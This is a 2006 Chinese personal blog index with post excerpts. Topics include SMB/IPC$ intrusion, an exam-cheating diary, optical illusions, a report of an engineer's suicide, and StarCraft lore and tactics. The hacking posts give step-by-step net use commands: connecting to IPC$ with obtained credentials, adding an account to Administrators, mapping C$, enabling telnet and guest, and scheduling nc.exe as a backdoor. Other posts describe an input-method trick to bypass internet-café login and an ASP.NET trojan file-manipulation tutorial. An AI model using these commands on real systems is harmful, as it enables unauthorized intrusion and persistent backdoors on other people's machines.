博文
[黑客]IPC$入侵详细解释(转)(2006-11-19 23:22:00)
摘要:
一般入侵首先是对目标主机进行端口扫描(portscan),建立在开放端口(服务)上的攻击是非常有效的。而通过共享入侵是网络中最最常见也是最基础的攻击方法。很多的网络安全初学者都是由这里开始的。
1 共享必须接触到的知识:
SMB {Server Message Block) Windows协议族用于文件打印共享的服务。
NBT {NETBios Over TCP/IP)使用137(UDP)138(UDP)139(TCP)端口实现基于TCP/IP协议的NETBIOS网络互联。
在Windows NT(windows 9x)以下版本中SMB基于NBT实现,而在Windows2000中,SMB除了基于NBT的实现,还有直接通过445端口实现。当Win2000(允许NBT)作为顾客来连接SMB服务器时,它会同时尝试连接139和445端口,如果445端口有响应,那么就发送RST包给139端口断开连接,以455端口通讯来继续.当445端口无响应时,才使用139端口;当Win2000(禁止NBT)作为顾客来连接SMB服务器时,那么它只会尝试连接445端口,如果无响应,那么连接失败。
如果win2000服务器允许NBT, 那么UDP端口137, 138, TCP 端口 139, 445将开放。如果 NBT 被禁止, 那么只有445端口开放.根据以上特点,当我们对目标主机进行portscan时,如果目标主机开放139,445端口,则基本上可以判断目标主机操作系统为windows NT/2K/XP,若只开放139端口,则目标主机操作系统有可能为windows 9x。但要注意:提供SAMBA服务的linux和UNIX操作系统的139端口也是开放的,用来提供类似windows的文件共享。
扫描到了开放139端口的windows系统,我们就能用BTSTAT命令来查询有关NetBIOS的信息。命令为:
nbtstat [-a RemoteName] [-A IP_address] [-c] [-n] [-R] [-r] [-S
] [-s] [interval]
解释:
-a 列出给定主机名的远程计算机的名字表(name table)
[日记]忙碌的一天(2006-11-19 18:46:00)
摘要: 今天早上9点半就起来, 郁闷, 好不容易早上不要上课,加上天气变天,本想美美的睡到11点, 可惜阿。 今天要去作弊。。 我的一位同学上学期考试笔试没过, 而且到现在为止已经补考了4,5次了。。 前三次好像免费,后面再补考的话就要教200的补考费。 哇,这么多,学校友赚了。。 10点来到学校,外面好冷啊。 受罪啊。 然后老师就找监考老师说了这件事, 因为这种结业考试总部会安排人来确认考生的,以防代考。 这位监考老师估计是刚来的,怕被发现。 且他监考老师都说没问题的,都说他们刚才检查完了就不会再来了。。 结果说了N久,总算说通了。。 让我进了考室, 晕。 里面只有3个人在考。 于是我拿起老师的试卷做了起来, 没想到刚做了大概5钟,做了12个选择题, 监考老师就走进来叫我出去了。。 寒,估计是怕出事。。 没办法,偶只能出去把写好的12个题目给老师了。。 老师也没办法,毕竟不是他监考的。。 给了后,偶也只能郁闷的走了, 妈的,一大早冒冷跑过来,题目还没做热,就被赶出来了。。 又得冒冷回去。。。
回到寝室。。 下午还要帮朋友的网上花店上传图片,还要帮另外一个朋友帮家,他要回邵阳。。 要把显示器,主机,衣服等等一些东西带回去。 朋友打了电话叫我过去, 一起吃了饭,就上去帮东西了, 晕。。 除了显示器,主机,还有一个行李箱,2个大袋子和3个小袋子。。 埃,其他的到没什么,就那个显示器,最麻烦,又重又大。。 一起抬到楼下,打的去汽车南站,坐了大概35分钟才到。 都坐的我头昏昏沉沉的。 有点想吐的感觉,估计是太久没做过的士勒。。 寒啊......
[图片]你的眼睛欺骗了你自己(转)(2006-11-19 18:23:00)
摘要:
爱因斯坦和贝壳:艺术家肯·诺尔顿用不寻常的物品创作了这幅肖像。这里,爱因斯坦像是用贝壳描绘成的。这些贝壳完全天然,没有经过修饰。
【解析】许多年来一大批艺术家在创作此类画像。蒙娜·丽莎画像也许是用奇怪的物品进行再创作中最受欢迎的,在货币邮票、小蒙娜·丽莎娃娃,甚至烧焦的面包片上都能内看到他的身影。
海神尼普顿:你能找到保卫海洋的海神尼普顿的像吗?
【解析】鱼、海豚和水下生物组成了尼普顿的外形轮廓。这是一个意义颠倒幻觉的绝好例子,由瑞士艺术家桑德罗·戴尔·普瑞特创作。
隐藏的拿破仑:你能发现站立的拿破仑像吗?这幅图形/背景幻觉图出现于拿破仑逝世后不久。
【解析】拿破仑就藏在两树之间。两树的内侧树干勾勒出了站立的拿破仑像。
身体的紫罗兰:你能在叶子中间找到三个隐藏的侧面人像吗?
米勒·莱尔幻觉:哪条红线更长?
【解析】信不信由你,两条红线完全等长。透视的运用大大地增强了传统的米勒·莱尔幻觉版本的效果。相形之下,传统的米勒·莱尔版本逊色不少。
曲的圆:这是一系列完好的同心圆。这是一个曲线幻觉的例子
曲线正方形:这些是完全的正方形吗?
【解析】正方形看起来是变形了,但其实它们的边线都是笔直而彼此平行的。比尔·切斯塞尔创作了这个曲线幻觉的视觉艺术版本
托兰斯肯弯曲幻觉:哪条线的曲线半径最大?
【解析】这三个圆弧看起来弯曲度差别很大,但实际它们完全一样,只是下面两个比上面那个短一些。视觉神经末稍最开始只是按照短线段解释世界。当线段的相关位置在一个更大的空间范围延伸概括后,弯曲才被感知到。所以如果给定的是一条曲线的一小部分,你的视觉系统往往不能察觉它是曲线。
伯根道夫环形幻觉:圆圈缺口部分的两端能完整地接上吗?
【解析】虽然端点看起来不连在一起,左边弯曲部分也显得比右边的小一点,但其实这是一个完好的圆。
......
[杂文]上海一36岁软件工程师遭日企裁员无力供楼跳楼身亡(转)(2006-11-19 18:16:00)
摘要:
上海一名36岁的软件工程师跳楼身亡。该工程师就职于一家日本软件公司,月薪一万,去年夏天该工程师为了结婚,贷款80万买入一套108平米的婚房,12000元每平米,现房,去年10。1他与自己刚认识半年的恋人,24岁的漂亮售货员结婚了。婚后为了让自己年轻貌美的媳妇过上更加幸福的日子,为了每月按时还银行7000多的贷款,他每天都更加努力加班加点地工作。
天有不测风云,由于这家日本公司业绩下滑,公司做出了裁员三分之一的决定。虽然他工作积极,技术也不错,但由于一直只是一名技术人员,加上年龄过大,
还是无情的被公司于今年7月份辞退。
屋漏又逢连夜雨,由于他性格木呐,年龄已经超过35岁,连续3个月也没有找到一个能月薪一万的工作,最后连8000也没有公司愿意聘用他。还贷的压力和失业的迷茫让他夜不能寐,茶饭不思。
从事售货员的妻子当时也是爱上了他的房子和不错的工作,自己工资也不多,看到他长时间的找不到工作,不仅没有安慰他鼓励他,反而整天唠叨数落甚至谩骂他,还一直喊闹着要离婚。他当时也想过把房子卖掉,众所周知,上海前几年的房价已经出现了大量泡沫,他当时买入时的房价几乎是最高点,在国家的调控下,房价逐渐回调朝合理的价位回归,现在的房价只值9000元每平左右,让他心理极度懊恼。在失业、婚变、还贷的多种压力下,加上平时不会自我调节以致于精神恍惚的他终于承受不了这突如其来的一切,于2006-11-5深夜从自家的阳台上跳了下去...
PS:虽然他工作积极,技术也不错,但由于一直只是一名技术人员,加上年龄过大,还是无情的被公司于今年7月份辞退。值得深思啊......
[黑客]一般入侵所需要的几个常用命令(转)(2006-11-16 12:09:00)
摘要:1:NET
只要你拥有某IP的用户名和密码,那就用IPC$做连接吧!
这里我们假如你得到的用户是hbx,密码是456。假设对方IP为127.0.0.1
net use \\127.0.0.1\ipc$ "456" /user:"hbx"
退出的命令是
net use \\127.0.0.1\ipc$ /delte
下面的操作你必须登陆后才可以用.登陆的方法就在上面.
----------------------
下面我们讲怎么创建一个用户,由于SA的权限相当于系统的超级用户.
我们加一个heibai的用户密码为lovechina
net user heibai lovechina /add
只要显示命令成功,那么我们可以把他加入Administrator组了.
net localgroup Administrators heibai /add
----------------------
这里是讲映射对方的C盘,当然其他盘也可以,只要存在就行了.我们这里把对方的C盘映射到本地的Z盘.
net use z:\\127.0.0.1\c$
----------------------
net start telnet
这样可以打开对方的TELNET服务.
----------------------
这里是将Guest用户激活,guest是NT的默认用户,而且无法删除呢?不知道是否这样,我的2000就是删除不了它。
net user guest /active:yes
----------------------
这里是把一个用户的密码改掉,我们把guest的密码改为lovechina,其他用户也可以的。只要有权限就行了呀!
net user guest lovechina
net命令果然强大啊!
2:at
一般一个入侵者入侵后都会留下后门,也就是木马种了,你把木马传了上去,怎么启动他呢?
那么需要用AT命令,这里假设你已经登陆了那个服务器。
你首先要得到对方的时间,
net time \\127.0.0.1
将会返回一个时间,这里假设时间为12:1,现在需要新建一个作业,其ID=1
at \\127.0.0.1 12:3 nc.exe
这里......
[漏洞]利用智能ABC漏洞网吧免费上(转)(2006-11-16 12:05:00)
摘要:
在任何可以输入智能ABC的情况 输入V 然后输入向上键 在输入DEL 在回车就会关闭该程序. 这样的话我们就可以利用他破解网吧登陆系统了
哈哈,这招爽把。。 照上面的做确实会关闭该程序,在自己电脑上实验过,不过没去网吧试过,估计也行......
[ASP.NET]解析Asp.net木马文件操作(转)(2006-11-12 23:06:00)
摘要: 要编写Asp.net木马,首先要导入名称空间System.IO。名称空间System.IO提供了大量文件和文件夹的操作功能,包括读写文件、创建和删除目录以及察看文件和目录的属性。
1. 浅谈取得文件和文件夹的信息
详细说一下attributes集合,它提供了文件和文件夹的额外信息,如是否只读的或隐藏的。
文件和目录的属性
属性 数字值
ReadOnly(只读) 1
Hidden(隐藏) 2
System(系统) 4
Directory(目录) 16
Archive(存档) 32
Encrypted(加密) 64
Normal(普通) 128
Tempory(临时) 256
SparseFile(稀疏文件) 512
Compressed(压缩) 2048
Offline(脱机) 4096
NotContentIndexed(非内容索引) 8192
要改变文件的属性,只需将这些值类加。例如,要将目录设置为隐藏+系统+加密+压缩,可以使用下面的语句:
f.attributes=2138
2138即2+4+64+2048
这些值估计新手很难记忆,我们直接用属性名称来设置,只要用或bitor来分割各属性,如:
f.attributes=FileAttributes.Hidden BitOr FileAttributes.System BitOr FileAttributes. Encrypted BitOr FileAttributes. Compressed
上述代码相当于f.attributes=2138
要确定文件或者文件夹的某个属性被设置,可使用与操作符bitand这样来检测:
if f.attributes bitand fileattributes.hidden >0 then
response.write(“属性为隐藏!”)
end if
检测函数:
sub getfileinfo()
dim f as new fileinfo(server.mappath(“te......
[星际]暴雪星际争霸官方剧情资料(转)(2006-11-11 18:57:00)
摘要:Terran族历史简介
【西方文明的衰退】
虽然二十世纪的科技和文化进步神速,但是和后世科技和文明的跳跃式进步相比起来,也只能甘拜下风。在二十一世纪末,人类的文明经历了巨大而且难以想像的进步。崭新的科技以难以想像的速度窜起,即使是地球上最为落后的国家也开始拥有越来越先进的电脑和资料库。在东欧共产主义解体的同时,核子武器开始变得随手可得。原来国际势力的兴衰是以资产和军事强权来作为依据,第三世界的国家却利用这个机会猛然窜起,挑战这些强权,打破国际间局势的均衡。
当系统控制学、复制和基因工程变成人人皆可掌握的科技之后,激进人道主义者和狂热的宗教团体开始质疑私人公司以基因工程图利的正当性。大众开始纷纷装置由精密工学所研制出来的人工器官,其他人则开始显现出各种各样的基因突变性状,包括了较为隐性的器官变得敏锐,到明显的心灵感应。人类基因库中所产生的这些变化,让全球各地的人本主义者感到非常的恐慌。
科技继续进步及扩张,人口增加的速度也开始飙升。在二十世纪结束的时候,地球上有六十亿的人口。仅仅经过短短的三百年,人口暴增为两百三十亿。污染和自然资源、燃料的耗竭更是火上加油。各个国家莫不竭力寻找降低人口成长率的方法。在人口爆炸、基因突变横扫整个地球的同时,一般人都认为地球将因此而走向天灾地变的结局。
当整个世界开使用越来越狐疑的眼光打量人造器官和基因工程的结果时,全球许多重要的金融体系因为承受不了本身的压力而纷纷崩溃。暴力行为和恐怖主义开始在日渐敌视的跨国公司和人道主义者之间蔓延,造成全球的警察都投入了控制暴乱的行列。不负责任的媒体以头条报导这些血腥的镇压行动,让许多大国的社会陷入了无秩序的混乱中。最后,原先互为抗衡的全球势力变成互相屠戮的地狱景象。
【新秩序】
在西元2229年11月22号,联合权力同盟(United Powers League)成立了。联权同盟是目前已经瘫痪的联合国的全球共治体系的继承者。这个新的权力结盟掌握了地球上将近百分之九十三的人口,只有少数几个反覆不定的南美国家没有加入这个同盟。这个同盟的基础是建立在『开明的社会主义』之下,但是却常常依靠严酷、残暴的警察体系来控制整个社会的秩序。在它统治的将近八十年历史中,联权同盟努力的推广他们的制度,导致日后人类不同文明间的......
[星际]Pass艺术 星际史上十大经典穿越(转)(2006-11-07 17:31:00)
摘要:
星际的魅力当然在此也体现的伶俐尽至然而什么是Pass呢? 简单意义上就是穿越,你第1反应当然是农民的点矿穿越,但仔细想想星际里面要做到穿越障碍,而且利用的非常的恰到好处,达到了实战战略上的目标。这样的Pass才是完美的。~然而我也把经典的NO Pass选入了一起,因为有了真正意义上的Pass,当然也少不了真正意义上的NO Pass。
排名第10
Dark Templar Arbiter组合拳(Dark Templar Hold Arbiter冰冻)
毫无疑问,Rekrul[pG]是一个非常具有天赋的选手,他最早大量使用了速Dark Templar然后速Arbiter冰冻的组合模式。在这场Rep里面Terran想要穿越Lost
Temple的路口变成了一件登天般的难事。
1、Dark Templar Hold(7:40在12点斜坡)一个暗堂死死站在对手斜坡中间,若
人族没在旁边闪下雷达,他的部队就很长时间不能下来了。
2、冰冻骚扰(24:45在12点斜坡)冰冻是神族仲裁者拥有的强大能力,能使敌方
相当数量的军队冻住很长一段时间,它也可在特殊情况下来扩张优势。
排名第9
GasJump(利用Gas的完美穿越)
大家不会忘了10大最后时刻里面那个辛勤的小蜜蜂吧?EEE,不对,是那个Probe。没错,在自己和对手都失去发展机会的最后时刻,对手躲到了阴暗角落造下了保命建筑。自己如何利用仅有的100多块钱跨过无可逾越的Mineral呢?
排名第8
Shadow Jump(Dark Templar最后的演出)
失去生产能力,没有可反隐型东西,对手一个Dark Templar死守路口,一切看起来是一个平局。但真的是这样吗,在一个并不完美的战斗中,却留下了一个非常完美的结局。TextBook仅剩下一个Pylon在6点,但是Textbook利用了一个Dark Templar堵住了路口。eXeCuToR把自己的三个Dark Templar也站到路口上,然后他把下面的两个Dark Templar合体,这样子,就把上面的一个Dark Templar挤过了敌人堵口的Dark Temp......